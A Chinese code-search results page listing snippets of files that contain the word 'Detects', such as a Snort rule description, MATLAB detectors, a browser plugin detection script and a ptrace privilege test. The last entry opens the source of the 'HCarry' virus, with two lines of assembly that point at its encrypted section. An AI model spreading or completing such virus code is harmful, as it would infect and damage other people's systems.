代码搜索:Detects
找到约 419 项符合「Detects」的源代码
代码结果 419
www.eeworm.com/read/418779/10925714
txt 449.txt
Rule:
--
Sid:
449
--
Summary:
This event is generated when a routing device detects that a packet has exceeded the maximum number of allowable hops.
--
Impact:
Informational. This indicates that
www.eeworm.com/read/440480/7688866
m featuressmdetect.m
% Detects features for each set of cuboids using stfeatures.
%
% INPUTS
% DATASETS - struct array contains all behavior data in dataset, should have fields:
% .IS - the N behavi
www.eeworm.com/read/127767/14337006
txt e096. pausing a thread.txt
The proper way to temporarily pause the execution of another thread is to set a variable that the target thread checks occasionally. When the target thread detects that the variable is set, it calls O
www.eeworm.com/read/305566/3772955
releasenotes
31 January 2001
This release detects an attempt to read from a pipe and exits w/
an error message.
Reginald H. Beardsley rhb@acm.org
www.eeworm.com/read/475105/6803595
js plugins.js
//This script detects the following:
//Flash
//Windows Media Player
//Java
//Shockwave
//RealPlayer
//QuickTime
//Acrobat Reader
//SVG Viewer
var agt=navigator.userAgent.toLowerCase();
v
www.eeworm.com/read/473927/6826104
txt 449.txt
Rule:
--
Sid:
449
--
Summary:
This event is generated when a routing device detects that a packet has exceeded the maximum number of allowable hops.
--
Impact:
Informational. This indicates that
www.eeworm.com/read/110490/15532596
c ptracetest.c
/*
* This little program checks whether your operating system allows a process
* to attach to another process whoose uid is only identical because it
* revoked its privileges.
*
* If it detects
www.eeworm.com/read/182606/9198943
m houghline.m
function [pdetect,tetadetect,Accumulator] = houghline(Imbinary,pstep,tetastep,thresh)
%HOUGHLINE - detects lines in a binary image using common computer vision operation known as the Hough Transform.
www.eeworm.com/read/458682/7291336
sh arrow-detect.sh
#!/bin/bash
# arrow-detect.sh: Detects the arrow keys, and a few more.
# Thank you, Sandro Magi, for showing me how.
# --------------------------------------------
# Character codes generated by the
www.eeworm.com/read/444676/7608753
asm hcarry.asm
;This is the HCarry Virus
;dedicated to the late Harry Carry
;The only AV scanner that I know of that detects this virus is TBAV Scanner
start: ;start of virus!
lea si, crypt_start